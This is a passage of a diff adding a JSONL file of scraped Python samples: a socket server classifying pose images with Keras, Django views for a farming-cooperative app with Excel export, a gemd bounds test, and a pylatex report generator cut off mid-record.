diff --git "a/229.jsonl" "b/229.jsonl" new file mode 100644--- /dev/null +++ "b/229.jsonl" @@ -0,0 +1,572 @@ +{"seq_id":"56810438","text":"import socket\nimport sys\nimport cv2\nimport pickle\nimport numpy as np\nimport struct # new\nimport zlib\nimport os\nimport time\nfrom keras.models import load_model\nfrom keras.preprocessing import image\n# Another File Python\nimport summary\nfrom summary import summariseTheResult\nimport koneksi\n\nkoneksi.savelog\n\n# Load Model\nmodel = load_model(\"/home/pandu/Documents/eksperimen/model/16jun21.h5\")\nos.system(\"clear\")\n\n# Set Connection\nHOST = 'localhost'\nPORT = 8080\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint('Socket created')\ns.bind((HOST, PORT))\nprint('Socket bind complete')\ns.listen(10)\nprint('Socket now listening')\n\nconn, addr = s.accept()\ndata = b\"\"\npayload_size = struct.calcsize(\">L\")\nprint(\"payload_size: {}\".format(payload_size))\n# End Set connection\n\n\ntotalFrames = 0\nnoAction = 0\nlabels = ['1', '2', '3', '4', '5', '6', 'Tidak ada gerakan']\n\nposeCount = np.zeros(7, dtype=int)\n\nnotResponse = 0\n\ndef showJson(poseCount, totalFrames):\n hasil = {\n \"NumPose\": poseCount,\n \"NumFrame\": totalFrames\n }\n # print(poseCount)\n koneksi.saveHistory(poseCount, totalFrames)\n print(\"Berhasil memasukan ke database\")\n print('close')\n \n\nwhile True:\n while len(data) < payload_size:\n print(\"Recv: {}\".format(len(data)))\n \n # If not receive data\n if len(data) < payload_size:\n notResponse += 1\n print(notResponse)\n print(\"tidak merespon\")\n # if notResponse > 500:\n # showJson(poseCount, totalFrames)\n # break\n\n data += conn.recv(4096)\n\n print(\"Done Recv: {}\".format(len(data)))\n packed_msg_size = data[:payload_size]\n data = data[payload_size:]\n msg_size = struct.unpack(\">L\", packed_msg_size)[0]\n print(\"msg_size: {}\".format(msg_size))\n while len(data) < msg_size:\n data += conn.recv(4096)\n frame_data = data[:msg_size]\n data = data[msg_size:]\n\n frame = pickle.loads(frame_data, fix_imports=True, encoding=\"bytes\")\n frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)\n\n # Mengirim Pesan dari Several\n\n \n # Menerima Pesan dari klien\n # message = conn.recv(1024).decode(\"UTF-8\")\n # print(message)\n\n\n\n\n # Predict Image\n test_image = image.img_to_array(frame)\n test_image = np.expand_dims(test_image, axis=0)\n result = model.predict(test_image)\n poseIdx = np.argmax(result, axis=1)\n\n print(\"Gerakan terdeteksi gerakan :\" + str(labels[np.argmax(result)]))\n poseCount[poseIdx[0]] = poseCount[poseIdx[0]] + 1\n totalFrames += 1\n\n\n\n # If not action\n label = labels[np.argmax(result)]\n if label == \"Tidak ada gerakan\":\n print(noAction)\n noAction += 1\n if noAction > 50:\n showJson(poseCount, totalFrames)\n break\n else:\n noAction = 0\n\n cv2.imshow('ImageWindow', frame)\n cv2.waitKey(1)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n showJson(poseCount, totalFrames)\n break\n\n\n\n\ncv2.destroyAllWindows()\ns.close()\nconn.close()\n\n# os.execv(__file__, sys.argv)\nos.system(\"python3 /home/pandu/Documents/eksperimen/eksperimenClasify/testAnotherFile/server.py\")\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"618251257","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.auth.models import Group\n# from django.contrib.gis.serializers import geojson\nfrom django.core.serializers import serialize\nfrom django.db.models import Sum\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nimport folium\nimport json\n\nfrom parametres.forms import UserForm\nfrom parametres.models import Projet\nfrom .forms import CoopForm, ProdForm, EditProdForm, ParcelleForm, PlantingForm, SectionForm, Sous_SectionForm\nfrom .models import Cooperative, Section, Sous_Section, Producteur, Parcelle, Planting, Formation, Detail_Formation\n\n\ndef is_cooperative(user):\n return user.groups.filter(name='COOPERATIVES').exists()\n\n#@login_required(login_url='connexion')\n#@user_passes_test(is_cooperative)\ndef cooperative(request, id=None):\n coop = get_object_or_404(Cooperative, pk=id)\n producteurs = Producteur.objects.all().filter(section__cooperative_id= coop)\n nb_producteurs = Producteur.objects.all().filter(section__cooperative_id= coop).count()\n parcelles = Parcelle.objects.all().filter(propietaire__section__cooperative_id=coop)\n nb_parcelles = Parcelle.objects.all().filter(propietaire__section__cooperative_id=coop).count()\n context = {\n \"coop\": coop,\n 'cooperative': cooperative,\n 'producteurs': producteurs,\n 'nb_producteurs': nb_producteurs,\n 'parcelles': parcelles,\n 'nb_parcelles': nb_parcelles,\n }\n return render(request, \"cooperatives/dashboard.html\", context)\n\ndef coop_dashboard(request):\n cooperative= Cooperative.objects.get(user_id=request.user.id)\n producteurs = Producteur.objects.all().filter(cooperative_id=cooperative)\n nb_producteurs = Producteur.objects.all().filter(cooperative_id=cooperative).count()\n nb_formations = Formation.objects.all().filter(cooperative_id=cooperative).count()\n parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n nb_parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative).count()\n Superficie = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative).aggregate(total=Sum('superficie'))['total']\n Plants = Planting.objects.all().filter(parcelle__producteur__cooperative_id=cooperative).aggregate(total=Sum('nb_plant'))['total']\n\n context={\n 'cooperative':cooperative,\n 'producteurs': producteurs,\n 'nb_formations': nb_formations,\n 'nb_producteurs': nb_producteurs,\n 'parcelles': parcelles,\n 'nb_parcelles': nb_parcelles,\n 'Superficie' : Superficie,\n 'Plants': Plants,\n }\n return render(request,'cooperatives/dashboard.html',context=context)\n\ndef add_coop(request):\n userForm=UserForm()\n coopForm=CoopForm()\n if request.method=='POST':\n userForm=UserForm(request.POST)\n coopForm=coopForm(request.POST,request.FILES)\n if userForm.is_valid() and coopForm.is_valid():\n user=userForm.save()\n user.set_password(user.password)\n user.save()\n cooperative=coopForm.save(commit=False)\n cooperative.user=user\n cooperative=cooperative.save()\n print(cooperative)\n cooperative_group = Group.objects.get_or_create(name='COOPERATIVES')\n cooperative_group[0].user_set.add(user)\n messages.success(request, \"Utilisateur Ajouté avec succès\")\n return HttpResponseRedirect(reverse('accueil'))\n context = {\n 'userForm': userForm,\n 'coopForm': coopForm\n }\n return render(request,'cooperatives/add_coop.html',context=context)\n\ndef add_section(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n sections = Section.objects.all().filter(cooperative_id=cooperative)\n form = SectionForm()\n if request.method == 'POST':\n form = SectionForm(request.POST)\n if form.is_valid():\n section = form.save(commit=False)\n section.cooperative_id = cooperative.id\n section = section.save()\n # print()\n messages.success(request, \"Section Ajoutée avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:section'))\n context = {\n \"cooperative\": cooperative,\n \"sections\": sections,\n 'form': form,\n }\n return render(request, \"cooperatives/sections.html\", context)\n\ndef add_sous_section(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n sections = Section.objects.all().filter(cooperative_id=cooperative)\n sous_sections = Sous_Section.objects.all().filter(section__cooperative_id=cooperative)\n form = Sous_SectionForm()\n if request.method == 'POST':\n form = Sous_SectionForm(request.POST)\n if form.is_valid():\n sous_section = form.save(commit=False)\n for section in sections:\n sous_section.section_id = section.id\n sous_section = sous_section.save()\n # print()\n messages.success(request, \"Sous Section Ajoutée avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:sous_sections'))\n context = {\n \"cooperative\": cooperative,\n \"sous_sections\": sous_sections,\n \"sections\": sections,\n 'form': form,\n }\n return render(request, \"cooperatives/sous_sections.html\", context)\n\ndef producteurs(request):\n cooperative = request.user.cooperative #Cooperative.objects.get(user_id=request.user.id)\n producteurs = Producteur.objects.all().filter(cooperative_id=cooperative)\n sections = Section.objects.filter(cooperative_id=cooperative)\n # parcelles = Parcelle.objects.all().filter(propietaire__cooperative_id=cooperative)\n\n prodForm = ProdForm()\n if request.method == 'POST':\n prodForm = ProdForm(request.POST, request.FILES)\n if prodForm.is_valid():\n producteur = prodForm.save(commit=False)\n producteur.cooperative_id = cooperative.id\n for section in sections:\n producteur.section_id = section.id\n producteur = producteur.save()\n print(producteur) \n messages.success(request, \"Producteur Ajouté avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:producteurs'))\n\n context = {\n \"cooperative\":cooperative,\n \"producteurs\": producteurs,\n 'prodForm': prodForm,\n 'sections':sections\n }\n return render(request, \"cooperatives/producteurs.html\", context)\n\ndef my_section(request):\n cooperative = request.GET.get(\"user_id\")#Cooperative.objects.get(user_id=request.user.id)\n coop_sections = Section.objects.filter(cooperative_id=cooperative)\n context = {'coop_sections': coop_sections}\n return render(request, 'cooperatives/section.html', context)\n\ndef prod_update(request, code=None):\n\tinstance = get_object_or_404(Producteur, code=code)\n\tform = EditProdForm(request.POST or None, request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Producteur Modifié Avec Succès\", extra_tags='html_safe')\n\t\treturn HttpResponseRedirect(reverse('cooperatives:producteurs'))\n\n\tcontext = {\n\t\t\"instance\": instance,\n\t\t\"form\":form,\n\t}\n\treturn render(request, \"cooperatives/prod_edt.html\", context)\n\ndef prod_delete(request, code=None):\n item = get_object_or_404(Producteur, code=code)\n if request.method == \"POST\":\n item.delete()\n messages.error(request, \"Producteur Supprimer Avec Succès\")\n return redirect('cooperatives:producteurs')\n context = {\n 'item': item,\n }\n return render(request, 'cooperatives/prod_delete.html', context)\n\ndef parcelles(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n prods = Producteur.objects.filter(cooperative_id=cooperative)\n parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n parcelleForm = ParcelleForm(request.POST or None)\n if request.method == 'POST':\n parcelleForm = ParcelleForm(request.POST, request.FILES)\n if parcelleForm.is_valid():\n parcelle = parcelleForm.save(commit=False)\n\n # parcelle.producteur_id = prods\n # for prod in prods:\n # parcelle.producteur_id = prod.\n parcelle = parcelle.save()\n print(parcelle)\n messages.success(request, \"Parcelle Ajoutés avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:parcelles'))\n\n context = {\n \"cooperative\":cooperative,\n \"parcelles\": parcelles,\n 'parcelleForm': parcelleForm,\n 'producteurs': prods\n }\n return render(request, \"cooperatives/parcelles.html\", context)\n\ndef parcelle_delete(request, id=None):\n parcelle = get_object_or_404(Parcelle, id=id)\n parcelle.delete()\n messages.success(request, \"Parcelle Supprimer avec Succès\")\n return HttpResponseRedirect(reverse('cooperatives:parcelles'))\n\ndef planting(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n #producteurs = Producteur.objects.all().filter(cooperative=cooperative)\n parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n plantings = Planting.objects.all().filter(parcelle__producteur__cooperative_id=cooperative)\n plantingForm = PlantingForm()\n if request.method == 'POST':\n plantingForm = PlantingForm(request.POST, request.FILES)\n if plantingForm.is_valid():\n planting = plantingForm.save(commit=False)\n planting = planting.save()\n print(planting)\n messages.success(request, \"Parcelle Ajoutés avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:planting'))\n\n context = {\n \"cooperative\":cooperative,\n \"plantings\": plantings,\n 'plantingForm': plantingForm,\n }\n return render(request, \"cooperatives/plantings.html\", context)\n\ndef planting_update(request, id=None):\n\tinstance = get_object_or_404(Planting, id=id)\n\tform = PlantingForm(request.POST or None, request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Modification effectuée avec succès\")\n\t\treturn HttpResponseRedirect(reverse('cooperatives:planting'))\n\n\tcontext = {\n\t\t\"instance\": instance,\n\t\t\"form\":form,\n\t}\n\treturn render(request, \"cooperatives/planting_edit.html\", context)\n\n#-------------------------------------------------------------------------\n## Export to Excel\n#-------------------------------------------------------------------------\n\nimport csv\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\n\ndef export_producteur_csv(request):\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"producteurs.csv\"'\n\n writer = csv.writer(response)\n writer.writerow(['CODE', 'TYPE', 'SECTION', 'GENRE', 'NOM', 'PRENOMS', 'CONTACTS'])\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n # producteurs = Producteur.objects.all().filter(cooperative=cooperative)\n\n producteurs = Producteur.objects.all().filter(cooperative_id=cooperative.id).values_list(\n 'code',\n 'type_producteur',\n 'section__libelle',\n 'genre',\n 'nom',\n 'prenoms',\n 'contacts',\n )\n for p in producteurs:\n writer.writerow(p)\n\n return response\n\n\nimport xlwt\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\n\ndef export_prod_xls(request):\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=\"producteurs.xls\"'\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('Producteurs')\n\n # Sheet header, first row\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n\n columns = ['COOPERATIVE', 'CODE', 'TYPE', 'SECTION', 'GENRE', 'NOM', 'PRENOMS', 'CONTACTS']\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n rows = Producteur.objects.all().filter(cooperative_id=cooperative.id).values_list(\n 'cooperative__sigle',\n 'code',\n 'type_producteur',\n 'section__libelle',\n 'genre',\n 'nom',\n 'prenoms',\n 'contacts',\n )\n for row in rows:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n\n wb.save(response)\n return response\n\ndef export_parcelle_xls(request):\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=\"Parcelles.xls\"'\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('Parcelles')\n\n # Sheet header, first row\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n\n columns = ['CODE', 'P.NOM', 'P.PRENOMS', 'CERTIFI', 'CULTURE', 'SUPER', 'LONG', 'LAT', 'SECTION']\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n rows = Parcelle.objects.all().filter(propietaire__cooperative_id=cooperative.id).values_list(\n 'code',\n 'propietaire__nom',\n 'propietaire__prenoms',\n 'certification',\n 'culture',\n 'superficie',\n 'longitude',\n 'latitude',\n 'section__libelle',\n )\n for row in rows:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n\n wb.save(response)\n return response\n\ndef export_plant_xls(request):\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=\"Planting.xls\"'\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('Plants')\n\n # Sheet header, first row\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n\n columns = ['P.CODE', 'P.NOM', 'P.PRENOMS', 'PARCELLE', 'ESPECE', 'NOMBRE', 'DATE']\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n rows = Planting.objects.all().filter(parcelle__propietaire__cooperative_id=cooperative.id).values_list(\n 'parcelle__propietaire__code',\n 'parcelle__propietaire__nom',\n 'parcelle__propietaire__prenoms',\n 'parcelle__code',\n 'espece',\n 'nb_plant',\n 'date',\n )\n for row in rows:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n\n wb.save(response)\n return response\n\nfrom io import BytesIO\nfrom reportlab.pdfgen import canvas\nfrom django.http import HttpResponse\n\ndef export_prod_pdf(request):\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'inline; filename=\"Producteurs.pdf\"'\n\n buffer = BytesIO()\n p = canvas.Canvas(buffer)\n\n # Start writing the PDF here\n p.drawString(100, 100, 'Hello world.')\n # End writing\n\n p.showPage()\n p.save()\n\n pdf = buffer.getvalue()\n buffer.close()\n response.write(pdf)\n\n return response\n\nfrom django.shortcuts import render\nfrom django.core.serializers import serialize\nfrom django.http import HttpResponse\n\n# def localisation(request):\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative).values('latitude', 'longitude')\n# json_res = []\n# for parcelle in parcelles:\n# json_obj = dict(\n# myproperty=parcelle\n# )\n# json_res.append(json_obj)\n# # map = folium.Map(location=[5.349390, -4.017050], zoom_start=8)\n# # for p in [parcelles]:\n# # print(parcelles)\n# # print(p)\n# # # marker de depart\n# # folium.Marker(parcelles[p],\n# # icon=folium.Icon(color='darkblue',\n# # icon_color='white',\n# # icon='male',\n# # angle=0,\n# # prefix='fa')).add_to(map) # icon=folium.Icon(color='purple'))\n# # # map.add_child(coordonnees)\n# # map = map._repr_html_()\n# context = {\n# 'parcelles': parcelles\n# }\n# return render(request, 'cooperatives/map.html', context)\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n# dict = list(parcelles.values())\n# for point, latitude, longitude in dict:\n# print(dict)\n# # if point:\n# latlon = [(latitude, longitude)]\n# map = folium.Map(location=[5.349390, -4.017050], zoom_start=8)\n# for p in range(len([latlon])):\n# # latlon +=p\n# # print(p)\n# # marker de depart\n# folium.Marker(latlon[p],\n# popup=point.producteur,\n# tooltip=point.projet.titre,\n# icon=folium.Icon(color='darkblue',\n# icon_color='white',\n# icon='male',\n# angle=0,\n# prefix='fa')).add_to(map)#icon=folium.Icon(color='purple'))\n# # map.add_child(coordonnees)\n# map = map._repr_html_()\n# context = {\n# 'carte': map,\n# 'point':point,\n# 'latlon' :latlon\n# }\n# return render(request, 'cooperatives/calcul_dstce.html', context)\n# # folium.Marker(location=[coord[0], coord[1]], fill_color='#43d9de', radius=8).add_to(map)\n# # map.save('cooperatives/map.html')\n# # return render(request, 'carte3.html')\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n# for parcelle in parcelles.values('latitude', 'longitude'):\n# print(parcelle)\n# # print(parcelle['latitude'], parcelle['longitude'])\n# latitude = (parcelle.latitude)\n# longitude = (parcelle.longitude)\n# # lon = parcelle.longitude\n# coordonne = [latitude,longitude]\n# map = folium.Map(location=[5.349390, -4.017050], zoom_start=12)\n# for point in coordonne:\n# # print(len(lat, lon))\n# folium.Marker(coordonne[point]).add_to(map)\n# context = {\n# 'map':map,\n# 'parcelle': parcelle,\n# }\n# return render(request, 'cooperatives/calcul_dstce.html', context)\n\n# def localisation(request):\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n# # data = serializers.serialize('json', parcelles)#json.dumps(parcelles)\n# data = serializers.serialize('json', Parcelle.objects.all().filter(producteur__cooperative_id=cooperative), fields=('latitude', 'longitude'))\n# # data = serializers.serialize('json', parcelles)#json.dumps(parcelles)\n# coordonnees = json.loads(data)\n# # print('point :', coordonnees)\n# # for p in coordonnees:\n# for latitude in list(parcelles.values()):\n# print('lat: ', latitude)\n# lat = coordonnees([latitude])\n# # long = coordonnees([longitude])\n# print(lat)\n# coordonne = [(lat)]\n# map = folium.Map(location=[5.349390, -4.017050], zoom_start=8)\n# for point in range(0, len([coordonne])):\n# folium.Marker(coordonne[point],\n# popup=point,\n# tooltip=point,\n# icon=folium.Icon(color='darkblue',\n# icon_color='white',\n# icon='male',\n# angle=0,\n# prefix='fa'\n# )).add_to(map)\n# # return render(request, 'carte3.html')\n# # map.add_child(coordonnees)\n# map = map._repr_html_()\n# context = {\n# 'carte': map,\n# # 'parcelle':parcelle,\n# # 'latlon' :latlon\n# }\n# return render(request, 'cooperatives/calcul_dstce.html', context)\n# # folium.Marker([lat], long)\n\n\n\n\n\n\ndef localisation(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n # parcelles = Planting.objects.filter(parcelle__producteur__cooperative_id=cooperative).all()\n context = {\n 'parcelles' : parcelles\n }\n return render(request, 'cooperatives/carte.html', context)\n # places = serialize('geojson', parcelles)\n # print(\"parcelles :\", parcelles)\n # print(\"places :\", places)\n # return HttpResponse(places, content_type='json')\n\n# def load_section(request):\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# cooperative_id = request.GET.get('cooperative')\n# # section_id = Section.objects.filter(cooperative_id = cooperative_id)\n# sections = Section.objects.filter(cooperative_id = cooperative_id)\n# producteurs = Producteur.objects.filter(cooperative_id=cooperative)\n# # parcelle_id = Parcelle.objects.filter(producteur_id=producteur_id)\n# # parcelle_id = Parcelle.objects.filter(producteur_id=producteur_id)\n# # cities = City.objects.filter(country_id=country_id).order_by('name')\n# context = {\n# 'sections':sections,\n# 'producteurs':producteurs,\n# }\n# return render(request, 'cooperatives/producteur_dropdown.html', context)\n\ndef formation(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n formations = Formation.objects.all().filter(cooperative_id=cooperative)\n context = {\n 'cooperative': cooperative,\n 'formations': formations,\n }\n return render(request, 'cooperatives/formations.html', context)\n\ndef detail_formation(request, id=None):\n instance = get_object_or_404(Formation, id=id)\n detail = Detail_Formation.objects.all().filter(formation_id=instance)\n # participants = Producteur.objects.all().filter(formation_id=formation)\n context = {\n 'instance':instance,\n 'detail':detail,\n # 'participants': participants,\n }\n return render(request, 'cooperatives/detail_formation.html', context)","sub_path":"cooperatives/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324695610","text":"\"\"\"Test of CategoricalBounds.\"\"\"\nimport pytest\n\nfrom gemd.json import dumps, loads\nfrom gemd.entity.bounds.molecular_structure_bounds import MolecularStructureBounds\nfrom gemd.entity.bounds.real_bounds import RealBounds\n\n\ndef test_contains():\n \"\"\"Test basic contains logic.\"\"\"\n bounds = MolecularStructureBounds()\n assert bounds.contains(MolecularStructureBounds())\n assert not bounds.contains(RealBounds(0.0, 2.0, ''))\n assert not bounds.contains(None)\n with pytest.raises(TypeError):\n bounds.contains('c1(C=O)cc(OC)c(O)cc1')\n with pytest.raises(TypeError):\n bounds.contains('InChI=1/C8H8O3/c1-11-8-4-6(5-9)2-3-7(8)10/h2-5,10H,1H3')\n\n\ndef test_json():\n \"\"\"Test that serialization works (empty dictionary).\"\"\"\n bounds = MolecularStructureBounds()\n copy = loads(dumps(bounds))\n assert copy == bounds\n","sub_path":"gemd/entity/bounds/tests/test_molecular_structure_bounds.py","file_name":"test_molecular_structure_bounds.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"651721502","text":"import numpy as np\n\nfrom pylatex import Document, Section, Subsection, Subsubsection, Tabular, Math, TikZ, Axis, Plot, Figure, Matrix, Alignat\nfrom pylatex import PageStyle, Head, MiniPage, Foot, HugeText, LargeText, MediumText, SmallText, NewLine, NewPage, LineBreak, simple_page_number, NoEscape\nfrom pylatex import Itemize, Enumerate, Description, Command\nfrom pylatex.utils import italic, bold\nfrom pylatex.package import Package\n\nfrom db.database import db_session\nfrom db.models import Evaluation, Step, Sign, Report\n\nfrom web.frontend import app\nfrom web.frontend.utils import get_file_name\n\ndef _get_header(doc, ev):\n\theader = PageStyle(\"header\")\n\n\twith header.create(Head(\"L\")):\n\t\theader.append(\"Final Report\")\n\t\theader.append(LineBreak())\n\t\theader.append(\"Created on 21/07/2017\")\n\n\twith header.create(Head(\"C\")):\n\t\theader.append(\"Author\")\n\t\theader.append(LineBreak())\n\t\theader.append(bold(ev.user.__str__()))\n\n\twith header.create(Head(\"R\")):\n\t\theader.append(simple_page_number())\n\n\t#with header.create(Foot(\"L\")):\n\t# header.append(\"Left Footer\")\n\n\t#with header.create(Foot(\"C\")):\n\t# header.append(\"Center Footer\")\n\n\t#with header.create(Foot(\"R\")):\n\t# header.append(\"Right Footer\")\n\n\tdoc.preamble.append(header)\n\tdoc.change_document_style(\"header\")\n\n\twith doc.create(MiniPage(align='c')):\n\t\tdoc.append(MediumText(\"Evaluation of\"))\n\t\tdoc.append(LineBreak())\n\t\tdoc.append(HugeText(bold(ev.title)))\n\n\treturn doc\n\ndef _out_new_lines(text):\n\tp = text.split('\\r\\n')\n\treturn p\n\ndef generate_files(evaluation_id,output):\n\n\tev=name=None\n\n\tif evaluation_id: \n\t\tev = db_session.query(Evaluation).get(evaluation_id)\n\n\t\tif ev:\n\t\t\t\n\t\t\tname = get_file_name()\n\t\t\tfile = '/'.join([app.config['REPORT_FILES'],name])\n\n\t\t\tgeometry_options = {\"tmargin\": \"3cm\", \"lmargin\": \"3cm\"}\n\n\t\t\tdoc = Document(geometry_options=geometry_options)\n\t\t\t\n\t\t\tdoc = _get_header(doc,ev)\n\n\t\t\twith doc.create(Section('PREPARATION')):\n\n\t\t\t\tif ev.preparation:\n\n\t\t\t\t\twith doc.create(Subsection(\"Purpose of inspection:\")):\n\t\t\t\t\t\tfor p in _out_new_lines(ev.preparation.purpose_of_inspection):\n\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\twith doc.create(Subsection(\"Informal inspection:\")):\n\t\t\t\t\t\tfor p in _out_new_lines(ev.preparation.informal_inspection):\n\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\twith doc.create(Subsection(\"Focus inspection: \")):\n\t\t\t\t\t\tfor p in _out_new_lines(ev.preparation.focus_inspection):\n\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\twith doc.create(Subsection(\"Scenarios:\")):\n\n\t\t\t\t\t\tfor s in ev.scenarios:\n\t\t\t\t\t\t\twith doc.create(Subsubsection(s.alias)):\n\t\t\t\t\t\t\t\tfor p in _out_new_lines(s.description):\n\t\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\tdoc.append(NewPage())\n\n\t\t\tstep_type_map = {\n\t\t\t\t\"STEP_TYPE.METALINGUISTIC\" : \"Metalinguistic signs\",\n\t\t\t\t\"STEP_TYPE.STATIC\" : \"Static Signs\",\n\t\t\t\t\"STEP_TYPE.DYNAMIC\" : \"Dynamic Sings\"\n\t\t\t}\n\n\t\t\tfor step in ev.steps:\n\n\t\t\t\tif step:\n\n\t\t\t\t\twith doc.create(Section(step_type_map[str(step.step_phase)].upper())):\n\n\t\t\t\t\t\twith doc.create(Enumerate(enumeration_symbol=r\"\\alph*)\",\n\t\t\t\t\t\t\t\t\t\t\t\t options={'start': 1})) as enum:\n\n\t\t\t\t\t\t\tfor sing in step.signs:\n\t\t\t\t\t\t\t\tenum.add_item(\"Sign name: \".join([sing.sign_name,]))\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\t\t\t\tdoc.append(SmallText(sing.description))\n\t\t\t\t\n\t\t\t\t\t\t\t\tif sing.evidences:\n\t\t\t\t\t\t\t\t\twith doc.create(SmallText(\"Evidences:\")):\n\t\t\t\t\t\t\t\t\t\twith doc.create(Figure(position='h!')) as pic:\n\t\t\t\t\t\t\t\t\t\t\tfor e in sing.evidences:\n\t\t\t\t\t\t\t\t\t\t\t\timage_filename = \"/\".join([app.config['UPLOADED_FILES_DEST'], e.file])\n\t\t\t\t\t\t\t\t\t\t\t\tpic.add_image(image_filename, width='300px')\n\t\t\t\t\t\t\t\t\t\t\t\tcaption = \"Evidence of sign \".join([sing.sign_name,])\n\t\t\t\t\t\t\t\t\t\t\t\tpic.add_caption(caption)\n\t\t\t\t\t\n\t\t\t\t\t\t\t\tif sing.breakdowns:\n\t\t\t\t\t\t\t\t\twith doc.create(SmallText(\"Breakdowns:\")):\n\t\t\t\t\t\t\t\t\t\twith doc.create(Itemize()) as itemize:\n\t\t\t\t\t\t\t\t\t\t\tfor b in sing.breakdowns:\n\t\t\t\t\t\t\t\t\t\t\t\tfor p in _out_new_lines(b.description):\n\t\t\t\t\t\t\t\t\t\t\t\t\titemize.add_item(p)\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\twith doc.create(Subsection('METACOMUNICATION MESSAGE')):\n\t\t\t\t\t\twith doc.create(Description()) as desc:\n\t\t\t\t\t\t\tif step.who_you_are:\n\t\t\t\t\t\t\t\tps = _out_new_lines(step.who_you_are)\n\t\t\t\t\t\t\t\tdesc.add_item(\"Who are you:\", ps[0])\n\t\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\t\t\tif step.what_learned:\n\t\t\t\t\t\t\t\tps = 